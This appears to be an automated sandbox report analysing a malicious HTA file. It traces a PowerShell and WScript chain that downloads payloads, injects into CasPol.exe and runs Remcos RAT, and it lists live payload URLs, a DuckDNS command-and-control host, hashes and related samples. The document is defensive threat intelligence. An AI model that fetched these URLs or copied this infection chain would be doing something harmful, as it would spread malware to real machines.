  Started: powershell.exe [14]

powershell.exe [14] (badges: 3 39)
  DNS/IP: 104.168.46.26, ports 49730, 49738, 80, AS-COLOCROSSINGUS, United States
  Dropped: bestofthingswithen...thignstodowithg.vBs (Unicode); C:\Users\user\AppData\...\blaytqul.cmdline (Unicode)
  Signatures: Detected Cobalt Strike Beacon; Suspicious powershell command line found; Obfuscated command line found; Found suspicious powershell code related to unpacking or dynamic code loading
  Started: wscript.exe [19]; powershell.exe [22]; csc.exe [24]; conhost.exe [27]

wscript.exe [19] (badges: 1)
  Signatures: Detected Cobalt Strike Beacon; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 3 other signatures
  Started: powershell.exe [29]

powershell.exe [22] (badges: 21)
  Signatures: Loading BitLocker PowerShell Module

csc.exe [24] (badges: 3)
  Dropped: C:\Users\user\AppData\Local\...\blaytqul.dll (PE32)
  Started: cvtres.exe [32] (badges: 1)

powershell.exe [29] (badges: 7)
  Signatures: Detected Cobalt Strike Beacon; Suspicious powershell command line found; Obfuscated command line found
  Started: powershell.exe [34]; conhost.exe [38]

powershell.exe [34] (badges: 15 16)
  DNS/IP: ip.3105.filemail.com, 193.30.119.205, ports 443, 49731, DFNVereinzurFoerderungeinesDeutschenForschungsnetzese, unknown
  Signatures: Writes to foreign memory regions; Injects a PE file into a foreign process
  Started: CasPol.exe [40]

CasPol.exe [40] (badges: 3)
  DNS/IP: nextnewupdationsforu.duckdns.org, 192.169.69.26, ports 14645, 49739, 49740, WOWUS, United States
  Signatures: Contains functionality to bypass UAC (CMSTPLUA); Detected Remcos RAT; Contains functionality to change the wallpaper; 4 other signatures

Antivirus, Machine Learning and Genetic Malware Detection

Source | Detection | Scanner | Label
sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.hta | 21% | ReversingLabs | Script-JS.Trojan.Cryxos

No Antivirus matches
No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label
http://104.168.46.26/1422/bestof | 0% | Avira URL Cloud | safe
http://104.168.46.26/1422/bestofthingswithentiretimegivenebstthignstodowithgreat.tIF | 100% | Avira URL Cloud | malware
http://104.168.46.26/1422/bestofthingswithentiretimegivenebstthignstodowithgreat.tIFP | 0% | Avira URL Cloud | safe
http://104.168.46.26/1422/RFGVGF.txt | 0% | Avira URL Cloud | safe
https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNd | 0% | Avira URL Cloud | safe
https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c | 0% | Avira URL Cloud | safe
https://3105.filemail.com/api/file/ | 0% | Avira URL Cloud | safe
https://3105.filemail.com | 0% | Avira URL Cloud | safe
nextnewupdationsforu.duckdns.org | 100% | Avira URL Cloud | malware
https://3105.filemail.co | 0% | Avira URL Cloud | safe
https://3105.filemailQ | 0% | Avira URL Cloud | safe
Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
ip.3105.filemail.com | 193.30.119.205 | true | true | - | unknown
nextnewupdationsforu.duckdns.org | 192.169.69.26 | true | false | - | high
3105.filemail.com | unknown | unknown | false | - | high
Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://104.168.46.26/1422/bestofthingswithentiretimegivenebstthignstodowithgreat.tIF | true | Avira URL Cloud: malware | unknown
http://104.168.46.26/1422/RFGVGF.txt | true | Avira URL Cloud: safe | unknown
https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c | true | Avira URL Cloud: safe | unknown
nextnewupdationsforu.duckdns.org | true | Avira URL Cloud: malware | unknown
URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNd | powershell.exe, 00000009.00000002.2047488224.0000000004DB8000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.1824468427.000000000582C000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000003.00000002.1709635524.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000003.00000002.1707345310.0000000004F86000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000009.00000002.2047488224.0000000004DB8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000003.00000002.1707345310.0000000004F86000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000009.00000002.2047488224.0000000004DB8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://104.168.46.26/1422/bestof | powershell.exe, 00000001.00000002.1818550362.0000000004B6D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://go.micro | powershell.exe, 00000001.00000002.1818550362.0000000004EC9000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/License | powershell.exe, 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/Icon | powershell.exe, 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://go.micros | powershell.exe, 00000003.00000002.1707345310.0000000005314000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://3105.filemail.co | powershell.exe, 00000007.00000002.2469026614.00000000031B7000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000009.00000002.2047488224.0000000004DB8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://geoplugin.net/json.gp | CasPol.exe | false | - | high
http://crl.micro | powershell.exe, 00000003.00000002.1706219573.0000000002F20000.00000004.00000020.00020000.00000000.sdmp; powershell.exe, 00000007.00000002.2473025138.0000000003386000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://geoplugin.net/json.gp/C | powershell.exe, 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmp; CasPol.exe, 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | - | high
https://aka.ms/pscore6lB | powershell.exe, 00000001.00000002.1818550362.00000000047C1000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000003.00000002.1707345310.0000000004E31000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000007.00000002.2476132425.000000000511A000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000007.00000002.2476132425.000000000512B000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000009.00000002.2047488224.0000000004C61000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000003.00000002.1707345310.0000000004F86000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/ | powershell.exe, 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.1824468427.000000000582C000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000003.00000002.1709635524.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://3105.filemail.com/api/file/ | powershell.exe, 00000009.00000002.2099410808.000000000746F000.00000004.00000020.00020000.00000000.sdmp; powershell.exe, 00000009.00000002.2100899330.0000000007541000.00000004.00000020.00020000.00000000.sdmp; powershell.exe, 00000009.00000002.2047488224.0000000004C61000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000009.00000002.2047488224.0000000004DB8000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000009.00000002.2046886997.0000000002F60000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000001.00000002.1818550362.00000000047C1000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000003.00000002.1707345310.0000000004E31000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000007.00000002.2476132425.000000000514A000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000009.00000002.2047488224.0000000004C61000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://3105.filemail.com | powershell.exe, 00000009.00000002.2047488224.0000000004DB8000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://104.168.46.26/1422/bestofthingswithentiretimegivenebstthignstodowithgreat.tIFP | powershell.exe, 00000001.00000002.1816371508.0000000000A88000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://3105.filemailQ | powershell.exe, 00000009.00000002.2099410808.0000000007496000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
Contacted IPs

IP | Domain | Country | ASN | ASN Name | Malicious
193.30.119.205 | ip.3105.filemail.com | unknown | 680 | DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | true
104.168.46.26 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
192.169.69.26 | nextnewupdationsforu.duckdns.org | United States | 23033 | WOWUS | false
General Information

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1562937
Start date and time: 2024-11-26 09:43:19 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 58s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 15
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.hta
Detection: MAL
Classification: mal100.rans.phis.troj.spyw.expl.evad.winHTA@19/20@4/3
                                                              EGA Information:
                                                              • Successful, ratio: 33.3%
                                                              HCA Information:
                                                              • Successful, ratio: 100%
                                                              • Number of executed functions: 63
                                                              • Number of non-executed functions: 189
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .hta
                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                              • Execution Graph export aborted for target mshta.exe, PID 7420 because there are no executed function
                                                              • Execution Graph export aborted for target powershell.exe, PID 7492 because it is empty
                                                              • Execution Graph export aborted for target powershell.exe, PID 7624 because it is empty
                                                              • Execution Graph export aborted for target powershell.exe, PID 7916 because it is empty
• Not all processes were analyzed; the report is missing behavior information
                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                              • VT rate limit hit for: sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.hta
Time | Type | Description
03:44:11 | API Interceptor | 136x Sleep call for process: powershell.exe modified
03:45:23 | API Interceptor | 3155666x Sleep call for process: CasPol.exe modified
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              193.30.119.205thinkingbestthingswhichcomingetniretimegivenmegood.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  New RFQ20241142.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                    Payment Advice.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                      Order Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                        OC25-11-24.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                          104.168.46.26Order Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                          • 104.168.46.26/1422/RFGVGF.txt
                                                                          192.169.69.26SX8OLQP63C.exeGet hashmaliciousVjW0rm, AsyncRAT, RATDispenserBrowse
                                                                          • yuya0415.duckdns.org:1928/Vre
                                                                          confirmaci#U00f3n y correcci#U00f3n de la direcci#U00f3n de entrega.vbsGet hashmaliciousUnknownBrowse
                                                                          • servidorarquivos.duckdns.org/e/e
                                                                          oKtkBYZMWl.exeGet hashmaliciousUnknownBrowse
                                                                          • csacsadhe.duckdns.org/byfronbypass.html/css/mss/Arzgohi.mp3
                                                                          oKtkBYZMWl.exeGet hashmaliciousUnknownBrowse
                                                                          • csacsadhe.duckdns.org/byfronbypass.html/css/mss/Arzgohi.mp3
                                                                          http://yvtplhuqem.duckdns.org/ja/Get hashmaliciousUnknownBrowse
                                                                          • yvtplhuqem.duckdns.org/ja/
                                                                          http://fqqqffcydg.duckdns.org/en/Get hashmaliciousUnknownBrowse
                                                                          • fqqqffcydg.duckdns.org/en/
                                                                          http://yugdzvsqnf.duckdns.org/en/Get hashmaliciousUnknownBrowse
                                                                          • yugdzvsqnf.duckdns.org/en/
                                                                          &nuevo_pedido#..vbsGet hashmaliciousUnknownBrowse
                                                                          • servidorarquivos.duckdns.org/e/e
                                                                          transferencia_Hsbc.xlsxGet hashmaliciousUnknownBrowse
                                                                          • servidorarquivos.duckdns.org/e/e
                                                                          http://www.secure-0fflce-o365.duckdns.org/Get hashmaliciousUnknownBrowse
                                                                          • www.secure-0fflce-o365.duckdns.org/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ip.3105.filemail.com | thinkingbestthingswhichcomingetniretimegivenmegood.hta | malicious | Cobalt Strike, Remcos, HTMLPhisher | 193.30.119.205
ip.3105.filemail.com | Doc261124.vbs | malicious | Snake Keylogger, VIP Keylogger | 193.30.119.205
ip.3105.filemail.com | New RFQ20241142.xls | malicious | FormBook, HTMLPhisher | 193.30.119.205
ip.3105.filemail.com | Payment Advice.xls | malicious | Remcos, HTMLPhisher | 193.30.119.205
ip.3105.filemail.com | Order Summary.xls | malicious | Remcos, HTMLPhisher | 193.30.119.205
ip.3105.filemail.com | OC25-11-24.xls | malicious | Remcos, HTMLPhisher | 193.30.119.205
nextnewupdationsforu.duckdns.org | Order Summary.xls | malicious | Remcos, HTMLPhisher | 192.169.69.26
nextnewupdationsforu.duckdns.org | seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta | malicious | Cobalt Strike, Remcos, HTMLPhisher | 192.227.228.36
nextnewupdationsforu.duckdns.org | FRSSDE.exe | malicious | Remcos | 192.227.228.36
nextnewupdationsforu.duckdns.org | Order_Summary.xls | malicious | Remcos, HTMLPhisher | 192.227.228.36
nextnewupdationsforu.duckdns.org | Order_Confirmation.xls | malicious | Remcos, HTMLPhisher | 192.227.228.36
Match | Associated Sample Name / URL | Detection | Threat Name | Context
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | thinkingbestthingswhichcomingetniretimegivenmegood.hta | malicious | Cobalt Strike, Remcos, HTMLPhisher | 193.30.119.205
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | Doc261124.vbs | malicious | Snake Keylogger, VIP Keylogger | 193.30.119.205
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | New RFQ20241142.xls | malicious | FormBook, HTMLPhisher | 193.30.119.205
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | Payment Advice.xls | malicious | Remcos, HTMLPhisher | 193.30.119.205
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | Order Summary.xls | malicious | Remcos, HTMLPhisher | 193.30.119.205
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | fbot.sh4.elf | malicious | Mirai, Moobot | 141.14.194.207
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | fbot.arm.elf | malicious | Mirai, Moobot | 132.252.36.195
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | la.bot.sh4.elf | malicious | Unknown | 129.217.110.41
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | la.bot.arm5.elf | malicious | Unknown | 141.33.15.156
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | la.bot.powerpc.elf | malicious | Unknown | 141.65.107.191
WOWUS | Order Summary.xls | malicious | Remcos, HTMLPhisher | 192.169.69.26
WOWUS | AWkpqJMxci.exe | malicious | Remcos, DBatLoader | 192.169.69.26
WOWUS | D2pQ4J4GGZ.exe | malicious | Remcos, DBatLoader | 192.169.69.26
WOWUS | decode_6ec70947443cc64628fe11013d0e752591680ef46c9a78ec1409313d6669bdf9.exe | malicious | XWorm | 192.169.69.26
WOWUS | ibTSSrn71X.exe | malicious | AsyncRAT | 192.169.69.26
WOWUS | Dxnrbs22FC.exe | malicious | AsyncRAT | 192.169.69.26
WOWUS | QUOTATION #46789RFQ_SUPLMS_NOV24_SALEH_CONSTRUCTIONS_LLC_PDF.exe | malicious | Remcos, DarkTortilla | 192.169.69.26
WOWUS | http://updatechrome.duckdns.org/1234567890.functions | malicious | Unknown | 192.169.69.25
WOWUS | file.exe | malicious | PureLog Stealer, XWorm | 192.169.69.26
WOWUS | SPA-0987-ORDER.exe | malicious | Remcos | 192.169.69.26
AS-COLOCROSSINGUS | thinkingbestthingswhichcomingetniretimegivenmegood.hta | malicious | Cobalt Strike, Remcos, HTMLPhisher | 198.46.178.192
AS-COLOCROSSINGUS | Payment Advice.xls | malicious | Remcos, HTMLPhisher | 198.46.178.192
AS-COLOCROSSINGUS | Order Summary.xls | malicious | Remcos, HTMLPhisher | 104.168.46.26
AS-COLOCROSSINGUS | PO_203-25.exe | malicious | Remcos, GuLoader | 192.3.176.134
AS-COLOCROSSINGUS | Shipping Document.xls | malicious | HTMLPhisher | 107.172.44.175
AS-COLOCROSSINGUS | solicitud de cotizaci#U00f3n..09.xlam.xlsx | malicious | Unknown | 104.168.7.19
AS-COLOCROSSINGUS | x86_32.nn.elf | malicious | Mirai, Okiru | 23.95.140.216
AS-COLOCROSSINGUS | sora.x86.elf | malicious | Mirai | 104.170.219.167
AS-COLOCROSSINGUS | arm7.elf | malicious | Mirai, Moobot | 192.3.253.172
AS-COLOCROSSINGUS | kXPgmYpAPg.doc | malicious | Unknown | 192.3.101.150
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | geHxbPNEMi.vbs | malicious | Unknown | 193.30.119.205
3b5074b1b5d032e5620f69f9f700ff0e | thinkingbestthingswhichcomingetniretimegivenmegood.hta | malicious | Cobalt Strike, Remcos, HTMLPhisher | 193.30.119.205
3b5074b1b5d032e5620f69f9f700ff0e | Dysacousma41.exe | malicious | GuLoader, Snake Keylogger | 193.30.119.205
3b5074b1b5d032e5620f69f9f700ff0e | Doc261124.vbs | malicious | Snake Keylogger, VIP Keylogger | 193.30.119.205
3b5074b1b5d032e5620f69f9f700ff0e | PO_0001.vbs | malicious | GuLoader | 193.30.119.205
3b5074b1b5d032e5620f69f9f700ff0e | Transferencia.pdf.lnk.lnk | malicious | Lokibot | 193.30.119.205
3b5074b1b5d032e5620f69f9f700ff0e | Transferencia.pdf.lnk.lnk | malicious | Lokibot | 193.30.119.205
3b5074b1b5d032e5620f69f9f700ff0e | RemittanceAdvice35282-17.xll.dll | malicious | Snake Keylogger, VIP Keylogger | 193.30.119.205
3b5074b1b5d032e5620f69f9f700ff0e | Transferencia.pdf.lnk.lnk | malicious | Lokibot | 193.30.119.205
3b5074b1b5d032e5620f69f9f700ff0e | Transferencia.pdf.lnk.lnk | malicious | Lokibot | 193.30.119.205

No context
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (428), with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):166662
                                                                          Entropy (8bit):3.910133536871477
                                                                          Encrypted:false
                                                                          SSDEEP:3072:1VUeFHOtbqwAQvoa4yLdbVUeFHOtbqwAQvoa4yLBVUeFHOtbqwAQvoa4yLM:nH6TA1SdpH6TA1SrH6TA1SM
                                                                          MD5:8BA4E1DCC487BD110B4BCD41E7EE2BA5
                                                                          SHA1:1881AFFF1EB946FDB3EE62133CA43D0BC136AC37
                                                                          SHA-256:4BCB2F9B3A929BD940484218EF0A8C03842480A15BD8A3C4521F5097BD89D581
                                                                          SHA-512:006B7DCFDB7EE27CA1E6AA536C2399321966FFC3B82BC0F86470614345B6E0A2A1ED1D7A143C500669FBA375F9706CFF8ED421502DF7F12F49C3260DC5A8BDE4
                                                                          Malicious:false
                                                                          Preview:..........L.W.u.x.i.o.b.i.P.G.x.U.r.j.Q. .=. .".G.a.k.i.G.l.i.Z.H.e.f.k.i.z.o.".....c.R.G.K.s.P.Z.i.Z.W.k.L.k.n.h. .=. .".e.A.L.L.e.L.R.W.N.f.B.n.W.P.L.".....f.A.z.e.t.L.e.U.G.N.N.R.A.m.k. .=. .".t.N.J.P.i.Q.a.c.S.h.e.j.N.p.d.".....L.f.i.U.W.j.K.C.f.C.c.k.q.x.b. .=. .".N.d.Z.k.K.z.L.d.P.Z.I.L.U.a.o.".....h.L.L.L.W.L.L.O.N.i.K.f.t.A.u. .=. .".d.i.o.L.N.i.l.R.K.L.v.x.i.R.n.".....B.k.k.G.c.k.k.c.H.R.d.a.h.p.r. .=. .".Z.P.N.b.p.d.Z.i.L.Z.m.P.W.L.L.".........N.G.P.W.v.K.L.L.P.z.k.u.L.h.Z. .=. .".C.I.K.W.a.W.W.L.f.G.h.Z.K.L.h.".....c.U.W.x.W.U.W.o.P.c.Z.L.t.C.h. .=. .".c.p.x.e.B.t.f.f.P.z.G.b.m.L.G.".....c.B.W.O.u.i.G.K.W.u.m.u.K.G.c. .=. .".m.h.L.W.G.W.l.o.c.L.W.k.W.O.h.".........d.l.G.K.b.i.c.B.c.b.h.m.k.K.u. .=. .".K.m.e.c.m.i.W.x.s.R.Q.H.k.L.L.".....p.e.N.N.Z.i.H.i.U.p.B.l.x.e.z. .=. .".q.b.q.x.h.i.P.n.K.K.L.W.G.i.b.".....R.b.B.e.W.p.j.B.H.i.K.c.x.P.z. .=. .".e.G.P.x.N.T.b.W.j.z.G.i.K.k.p.".....L.p.d.P.G.P.K.k.f.L.c.L.P.v.b. .=. .".e.n.z.A.W.P.L.U.o.p.u.G.i.a.c.".....G.m.z.c.f.G.I.e.K.Z.
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):5829
                                                                          Entropy (8bit):4.901113710259376
                                                                          Encrypted:false
                                                                          SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
                                                                          MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
                                                                          SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
                                                                          SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
                                                                          SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
                                                                          Malicious:false
                                                                          Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):64
                                                                          Entropy (8bit):1.1940658735648508
                                                                          Encrypted:false
                                                                          SSDEEP:3:Nlllul84w/l/lZ:NllUOl/
                                                                          MD5:115C6867FB5AA137E2AB070A015217FF
                                                                          SHA1:274FA5340B810ECAC889E8A7ECF3EFCBC38ABB5F
                                                                          SHA-256:441CC5F34F21F191CF4AABE142FD3F04FA06663E2C28EC4D6229A1CAAF69A195
                                                                          SHA-512:0599907296251F104F57B32FDF3BE8F043F60E8DFA4327ED728EB421F329AE8B6EA6BCC3C0829EA61FE072D92FA62C5C95DC237FE3CF94C59FA6D0A509B8EEC2
                                                                          Malicious:false
                                                                          Preview:@...e................................................@..........
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Tue Nov 26 10:27:18 2024, 1st section name ".debug$S"
                                                                          Category:dropped
                                                                          Size (bytes):1328
                                                                          Entropy (8bit):3.992666843697609
                                                                          Encrypted:false
                                                                          SSDEEP:24:HL56e9E2+fgviXDfHuwKEbsmfII+ycuZhNuakS2PNnqSqd:WgKztKPmg1ulua3KqSK
                                                                          MD5:F4AAFCB66577027BACB9A939DC1BB340
                                                                          SHA1:ADACC5EA81C6DA42CC86CA8C6F2FF7FD366F9FDB
                                                                          SHA-256:893666AFE07DDEF097E95BD6B70412EA5B080CEFC33A2C86342792B70046DCE3
                                                                          SHA-512:F9209D309D4926290F52F271043B950DE6A1537749D12DE3EBCF144ADB04991C22B28DC965EA5FA5E254E5F8FB54F9FBE93A92FF8075A960EBF1ED43A54B81F0
                                                                          Malicious:false
                                                                          Preview:L.....Eg.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\blaytqul\CSC6824B6AE21FF4F1D9A4E95662E7FF991.TMP................Z...DBH2<...&...........4.......C:\Users\user\AppData\Local\Temp\RESF818.tmp.-.<....................a..Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.l.a.y.t.q.u.l...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
